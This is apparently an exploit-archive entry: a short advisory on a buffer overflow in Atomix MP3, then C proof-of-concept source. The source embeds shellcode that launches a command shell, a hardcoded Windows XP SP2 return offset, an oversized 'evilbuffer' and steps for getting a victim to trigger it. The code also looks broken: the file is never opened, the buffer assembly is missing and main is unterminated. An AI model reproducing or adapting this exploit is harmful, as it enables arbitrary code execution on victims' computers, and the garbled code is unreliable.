// source: https://www.securityfocus.com/bid/23756/info
Atomix MP3 is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
An attacker could exploit this issue by enticing a victim to load a malicious MP3 file. If successful, the attacker can execute arbitrary code in the context of the affected application.
////////////////////////////////// [ STARTING CODE ]
//// [ Explanation ] this probe of concept make
//// a malicious file that exploit the error.
//// [ Note ]
//// it was coded for Windows XP with SP2-es
//// if you want to try it into your own PC
//// it is necessary that you change this Offsets
//// for your own offsets.
//// on:
//// char offset[]="";
//// AND
//// mov ebx,0x77BF93C7
//// Enjoy it n_nU!..
//// Coded by preth00nker (using Mexican skill!)
#include <stdio.h>
#include <conio.h>
#include <string.h>
char shellcode[] = //A simple CMD Call =)
"\x55" //push ebp
"\x8B\xEC" //mov ebp,esp
"\x33\xFF" //xor edi,edi
"\x57" //push edi
"\xC6\x45\xFC\x63" //mov byte ptr [ebp-04h],63h
"\xC6\x45\xFD\x6D" //mov byte ptr [ebp-03h],6Dh
"\xC6\x45\xFE\x64" //mov byte ptr [ebp-02h],64h
"\x8D\x45\xFC" //lea eax,[ebp-04h]
"\x50" //push eax
"\xBB\xC7\x93\xBF\x77" //mov ebx,0x77BF93C7
"\xFF\xD3"; //call ebx
/*Evilbuffer - 520 Bytes Free4exploit*/
char evilbuffer[521] = "";
/*Data Base for songs found into the computer*/
char file[] = "mp3database.txt";
/*Call ESP SP2-es*/
char offset[] = "\x8B\x51\x81\x7C";
char temp[1024];
int main(){
printf("###### Exploit Atomix 2.3\n");
printf("###### By Preth00nker\n");
printf("###### Preth00nker [at] gmail [dot] com\n");
printf("###### http://www.mexhackteam.org\n\n\n");
printf("###### http://www.prethoonker.tk\n\n\n");
FILE *fich;
printf(" (*) Creating the file: %s\n", file);
printf(" (*) Adding the evilbuffer\n");
printf(" (*) Adding the Offset: %s\n", offset);
printf(" (*) Adding the Sellcode\n");
fwrite(temp, strlen(temp),1, fich);
printf(" (*) Writting into the file\n");
printf(" [ Usage: ]\n");
printf("Step 1.- Generate the Evil File into the %ProgramFiles%\\AtomixMP3\\ \n");
printf("Step 2.- Run atomixmp3.exe\n");
printf("Step 3.- Click On Search module and Click (again) on the unique file found.\n");
printf("have fun =)!");
return 0;
////////////////////////////////////////// [ E O F ]